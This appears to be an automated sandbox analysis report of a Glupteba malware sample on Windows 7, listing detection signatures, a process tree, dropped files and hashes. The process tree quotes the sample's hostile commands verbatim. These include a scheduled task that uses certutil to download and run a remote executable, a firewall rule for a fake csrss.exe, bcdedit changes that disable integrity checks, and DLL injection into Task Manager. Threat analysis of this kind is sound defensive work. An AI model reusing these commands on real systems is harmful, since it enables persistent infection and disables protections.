Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22/01/2024, 15:20

General

  • Target

    6fc52358b0e882de1fb890076f83172f.exe

  • Size

    4.4MB

  • MD5

    6fc52358b0e882de1fb890076f83172f

  • SHA1

    00fd67d3a87d10c0f8787cd580572c4cd1a7aaa8

  • SHA256

    8980c8abaa3365782c905b3f9506a032c54a5d1833fef1fe0ce46b6f84ee7534

  • SHA512

    f100a089063a9a65662cc863504ffd752a9bb245eae07b80a2dece2c8d19aa1d2b865bc950d134efc2775c23c923f8690785dce835df8f8174eb1654ef147990

  • SSDEEP

    98304:vnGiqTWRDnHhCwJsgkfTryDBzpf8pK5EQgotfPM7TkOtOZAK:rqTEH8wJsJTWVp0pVpIfUIAK

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 22 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe
    "C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe
      "C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2636
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /197-197
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:320
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2196
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1312
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:716
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1036
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2404
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1188
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1108
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2396
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2400
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:912
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1784
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2968
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2772
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:344
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:2960
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:820
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1500
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122152049.log C:\Windows\Logs\CBS\CbsPersist_20240122152049.cab
    1⤵
    • Drops file in Windows directory
    PID:2684

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

          Filesize

          42KB

          MD5

          269e8b02718af7f2f71e0eeaf4837b7c

          SHA1

          34ea9afa097205d5e4d4366ea587408a9e600537

          SHA256

          9c28018e9d6cefeb805ae494322d9c7cd5f1f9b7a5d8e19aef9bab1810f4b05a

          SHA512

          50ef6084db99a6a03d925ae435e4f603ada541ff74667abe1c52042167f87cc0a7239fac04aa3501a2536aa79b1181c4580b76862b5a1b05ca6a382eeee5b0de

        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

          Filesize

          37KB

          MD5

          1f36de1d64a92087b215ef149fcd2568

          SHA1

          bf21f29c1bcfc1b4d17456441c4f226636dcaa25

          SHA256

          d4317d9b4c2fa1b185603702ecd3308d56e6be9e2d9d46fea696dadabd3f9236

          SHA512

          94d2cb973a3003b43baec597928386d26961e94b88eef6e34c9f4bdfcb6b24a9d3f0a5f567dab1cbb03f5932ec2af1b9bc536c0bdb6b3e86d6fb33a0ed5146b4

        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          121KB

          MD5

          e60d530400f028af7e922e5e2c875ca0

          SHA1

          ad9f16a7508a4a6b7b3d1f9ae245b8a48dbebf80

          SHA256

          fa113874bde122c7537fcb83deec6de3585d752d295785cd82c00cc8476ad71c

          SHA512

          af282a2b38e3953206ce8a375730d69680e998bfa11885b93066023e23d725b0e4449b56a2c9f0126b577ed200af9d67bd00f63654cc31951143ca887cf836a3

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          209KB

          MD5

          bba273ffce24abc1818e5bd05ced2274

          SHA1

          e1471f7f3480ce7f8b71c621a8d3d17ecc074c28

          SHA256

          edbf0d3e4e03ee8d28b71ad91cf243d913b59d7d85a4deae728e353fdd3350a4

          SHA512

          2471f1ea301c9f43e8abcdb6fd6db4ffe4702d00ddf7a50f204c6bd4a9012c8525f1932f635719883eefec8badba8525bed9b0a9613c1da2daa6218eaf56daab

        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          40KB

          MD5

          29ec5d0b01a712a99c49bccd2f19658a

          SHA1

          32c389a909c624633374640c736653bd252cb020

          SHA256

          05f969845fc9a3ae39d6b2fc4b0ab4955c074f52b7d6345787c31ab6cbe0df58

          SHA512

          de461f82fd3358a9d12b4bb92ab14309e51be3b00099cf6f8425e94518d7ffac4c8e0db3426a45aadfd9eca616d69028b7e7be75a4fe6d80a1c23301e81b13ff

        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          66KB

          MD5

          2df646ac6917e545b8696d4c45c3fb1b

          SHA1

          39c990df4ec8a91442de7e57a1248a281e4fd936

          SHA256

          88687e57ee0b00b03269567028a7c6cb7fe3b89e5d1d69548da5da81bc3d96ee

          SHA512

          59d25f73fdb2f3c969e0f5c43ea3635b04b4dcde0f68302e23fa0bf9cb3341b7d036627549d332121fe04666b8628ddeaa99226e2bc0bd6f6d86a1974fb1120c

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

          Filesize

          893B

          MD5

          d4ae187b4574036c2d76b6df8a8c1a30

          SHA1

          b06f409fa14bab33cbaf4a37811b8740b624d9e5

          SHA256

          a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

          SHA512

          1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          93b04407613a8c377c4921879bef1c07

          SHA1

          3c3b3e00f03cbad5cc705569d1dbf1a8ee4d94e5

          SHA256

          8b453c6634578d7749d816547ed7d488d41c4e839de8c2a8b0831cc8f2dd9b23

          SHA512

          e8026352f327cb7b3bc154c03f37b7b608e5a42720faf1fd6f08ec8fb68544717401f3e33d3c97f2c2d1122707cec74bdd0a3d2eaa99497e02932dbd00a8c52f

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          5c8aa3aacd1d65e5cd2d969adf35607b

          SHA1

          12b7a37a1b9efc7a8f79c96e351f0d613db4df50

          SHA256

          1699adc2ebffb223908aa5e1e37b163ecb8e9f82d7d7165989773fbe1425f48b

          SHA512

          adb50e976a5ed3695949836d9d66b38bbefac7285a52fc00efaf781774b812348ad83e66caebf33bcf3614a97d5a4967e65c106276c124e7061034c0cec20513

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          d138f54a13723ffd1a5b5b343e2a2576

          SHA1

          d96ae16bfc3204c268886cc6b2bb9098b08b4a7f

          SHA256

          05f2040d24e5fa6ad3401841afac77fdad516f69c09814eecbb2678c6bb7e279

          SHA512

          10117c5cdae457a315c5560299d724ce52549bd01f7ad4aba9f7d831be903223addd96dadaa9c4aa2ccc129b94a521d631ec4888b2b8008feeebc9de542266da

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          601852b4ebfc21c6e5a79a7b8783823f

          SHA1

          157a9b3217b9900dcd71a7a869d2da9ea8e2a700

          SHA256

          95d39b3ea0c51babc38f2a880f1c48976d3ad92e7d172718b4f675c7e75e0714

          SHA512

          c0b434fc4c505178ea459a5e368b56809555b56e4481d58abfcaeda89ce06ff51fc7b25fed680f42a31e95e08b5fe622f510f6846bb2167e79aa6726d8a7f05e

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          b24e2f2d1639cd0fb5b498ecc771ee76

          SHA1

          94ccfd71a6e41d8de0e15fda40d71d3e2e5cec91

          SHA256

          f99d1d19d9c549927e5d26d7ff2ac3c4d709de82f4591fe3aedd332839ada125

          SHA512

          1be4ccab20e6bf8524cb42027445991aa2ef23d9dc0587eed004401c5924182fa81ecb8191d428091e9dff8d1c2cc85fb9e16e063f8a1f60c1295a49e500d628

        • C:\Windows\Temp\Cab36C9.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Windows\Temp\Tar36DC.tmp

          Filesize

          146KB

          MD5

          55b1d0a492e483c4b763705480044b9a

          SHA1

          bb49de38c64e58b52478e79afd3d4c90d98b735b

          SHA256

          443a93df5c21f6b334b2cf4f409255efa09d94643e08f21d44e0a50e9944d1e1

          SHA512

          df43f1757e2429a7a72aaee718d6517deec7a967e8cd6998aac55196f965d2b390c60257ccb6e0e3522052673769a8576292d204dce9373c21b20e5e453d8375

        • C:\Windows\rss\csrss.exe

          Filesize

          29KB

          MD5

          da3a466db3f5fe8f843ef7cfd1618c28

          SHA1

          82ec11965b091ea236be6e19ba911105716041dd

          SHA256

          41c380c00a5d5da95b62829040e5742a88cc504ad8ca5c543e4a2b5318782bc6

          SHA512

          b483766fa8d7bd73a5758c19521524f41cd88799a717637b3dd193a66e0dccbc96259034992d2fbad371e19ec4884966fda9ccaa32a41a38482cbc11a1a4b383

        • C:\Windows\rss\csrss.exe

          Filesize

          94KB

          MD5

          6926adaf780305972fb5cf31ebe9a2ed

          SHA1

          e8aa1edc06d2f5ee82d149d2fd95020390f65ba1

          SHA256

          f1dabaf445249d13ea71abba5bcdb90c9d761f4033cfe7df55120501677e562d

          SHA512

          8b5eb0389dd381c35a5a192ab5b42330cbd4b76e064e610bb3a066d8affc00e26cc22453828a55be5de34ff0a19ec4fd9ec85225d907dd9c8a6ebf64c97a8087

        • C:\Windows\rss\csrss.exe

          Filesize

          257KB

          MD5

          385cf39a9e9589df2810c2bbf6de34e6

          SHA1

          6103a6084030034b5cc632a867f95c2b0ae64918

          SHA256

          e5ba7b7c2e4fcd9f2eaa1df62f9c4dce5dd3694b5e57473a2cf3a45d10628f6f

          SHA512

          284dfde3bd17b713ec53dfc102d0e1e5953edcc95ebf93b261eee7033d7456fd55f07e9d2197184c06176ac1e022fba0c77e307e6cf70eab695811549460464c

        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          61KB

          MD5

          40b987a0e34d0b76ed5040eec345045d

          SHA1

          97911641cbcc410965c135c2c6c7ec2d07bb840c

          SHA256

          6f978cf047b9dc37ffa64e634ac269bac5ef7694d3cbaa321b900fd8e1d5133a

          SHA512

          b5e56e22510bd1c9557e359f6758626f7e1d0510f00cc8a1673932595bfe54f5208fb6b80eb28266fb62e1ad381b8547f3e99318e910eee47bdf077489ab51c5

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          356KB

          MD5

          185707ee44bcf0704b83b7e3a4cc1402

          SHA1

          d80228b6be8a7ecbf59a8f3907a14d45053f06c1

          SHA256

          0bc385fe30975e64ff33165ffefb30f83574dd51f10dfe207ec31cf78936dfe8

          SHA512

          e2e74590c4586d05aa7f950e919555e82e840390b3c01881684e3e1783b7076d9042708a745fc6355c8d9253ec3f5b61603de521d0e8ea8379a2b9b12aa664f8

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

          Filesize

          283KB

          MD5

          e88625bce8978293ad8ceb37b0971c46

          SHA1

          8daa789d5725fe851aff894b1e3426c976a5c3be

          SHA256

          8004b05b9094d57ba42db8f2501400e5093a52604dbe38467163ffee01ac2f40

          SHA512

          1df9e711c09a5687d5ef41746d8a2f99a04c397cab9e392b47054581e32096096a71db4f5f38a9d514fff7dd4679ee5a2e5a30f9956a240045a8eca356d47edd

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          295KB

          MD5

          1430d9cfff91ada560881dceb6278a03

          SHA1

          f083a7df5ad4125fb4755f3e7ddb73a11ce1dc5e

          SHA256

          32bd93b964a5ec12d2eb96ee08070e2fabb15679ca629ac00a2862d932a029ef

          SHA512

          7f64cfde9c67c53c505f5902b34229bad0562e382cda48267279f4dd56ce1bc4130afeb655cad61f81f3aa742952a48dc9a6377a08b895241ea7331637bb3bed

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          308KB

          MD5

          0e743a01afc12536d971b4235a577d7f

          SHA1

          ec837490ad49136bc237f412065d040228072607

          SHA256

          8f953aaf7ac5abd5ae4113b2ad67530531ccf91d95010976b863790d2980e4fc

          SHA512

          10edfbb929348a108cbe034a706c069aa09f69c5531cd079fa48fbb33a9a45474dfa3683fa70993fa9b92c4e74bd4d75e62209a440b8d2524bdacb2f927dd22f

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          10KB

          MD5

          0a7dde37ef86ec6c37fad7d2ceea6723

          SHA1

          778c484b2334f226aa424f5f7448488af5b25240

          SHA256

          867f9ef995ed60045ed2d2a8f2c97c1a6b329303231bdd9b75baea6bea729dc2

          SHA512

          075483bee52787dae91e66ee52faa80aba476945daa942d1f9d53a284c4b178acf1c9172b37223e629053704ceca819d84070f5a95bf0930eb9dc4314b3d9c0c

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          53KB

          MD5

          21ed97d74994c8357fe39aecd8efc8f5

          SHA1

          c990bb19652cff77687d45ff3c189b9572d35aa2

          SHA256

          8f65ff40c4bc4d3f881fd428d1fa9f875ddce6336183b404fd0e9cf3c5819ec3

          SHA512

          b44f2c4a9345a754b2c42e2052d4f680c18eee4c4d327b1c94b0aadd27318c02ffe0a4a9c6a049c4a25ae1ea94b2e8082c29f0e334f9f9c19f1adf6b701a6806

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          91KB

          MD5

          c3ca5c6e95210ff78adb90747a474ff1

          SHA1

          87b78723e6c658ad2eab5be8b5607863dbd0b212

          SHA256

          6d155f496f392164a8cd83e2bb8dc9293f04659c2dc26149d166aae61ad19e55

          SHA512

          26f83d03026d50c0db26f6cabd022d50272ba6d76ba33a31d221d55f05e39daf166bd920a6915e177fe1dc2c53e8046873694761d031e76401050d8ab8b37b8b

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          45KB

          MD5

          4327e7df202eb6c5dbae78a54419715f

          SHA1

          9129642c83f6c529d7e6be034f39d0da3487909c

          SHA256

          279f97ca83a487d57152b676287c070855c092e6ab2fa03b094f0ee38c7d48c9

          SHA512

          88eccd99b472a855af7cd04b3d61fe841c9f3d819e15db2f8b07d91e95a61c5303a04b7ea256e7253b999597908b5802fc1185b76f6e04ff5a2fea73b1ced10d

        • \Users\Admin\AppData\Local\Temp\symsrv.dll

          Filesize

          163KB

          MD5

          5c399d34d8dc01741269ff1f1aca7554

          SHA1

          e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

          SHA256

          e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

          SHA512

          8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

        • \Windows\rss\csrss.exe

          Filesize

          776KB

          MD5

          e48d76bc67000593f276248b22854291

          SHA1

          4b98d8b30b70b51bab29d32afa734e34406aa66f

          SHA256

          182b137d01de00a40dac8b4be2a85749618115e993857082ff76a1ff275b85ab

          SHA512

          87de9acc3016370cda9bcb918847017253404c0c1bf7c76e21e14d6a41a0ef182677a98010389a806e617281bd96ff314fcde7f4ef7d2d241c4b0352fa6a83f6

        • \Windows\rss\csrss.exe

          Filesize

          97KB

          MD5

          69dbfc8a092503f99dc31ac921039f4e

          SHA1

          d85c0504ef5ee50d9bd0ae624e941964c2c1d752

          SHA256

          ca02f11f3ac601fa88b61def69fd322935972ed730f51f8d35ee57382033f677

          SHA512

          5f8c13228577efdca3968d5a881d6cc6bb02cbf9879077d119fa10ddde68b85a6a60bd937881f4dfcef2ec227ce68285d2a602bb90efb014a9e7e84cfbef08fb

        • memory/1548-44-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1548-36-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1888-1-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-6-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-2-0x0000000005020000-0x0000000005946000-memory.dmp

          Filesize

          9.1MB

        • memory/1888-3-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/1888-0-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-8-0x0000000005020000-0x0000000005946000-memory.dmp

          Filesize

          9.1MB

        • memory/1888-4-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-384-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-388-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-300-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-298-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-294-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-404-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-24-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-22-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-403-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-400-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-390-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-353-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-389-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-299-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-383-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-19-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-385-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-386-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-387-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-20-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-21-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-10-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-7-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-5-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-9-0x0000000004F20000-0x0000000005846000-memory.dmp

          Filesize

          9.1MB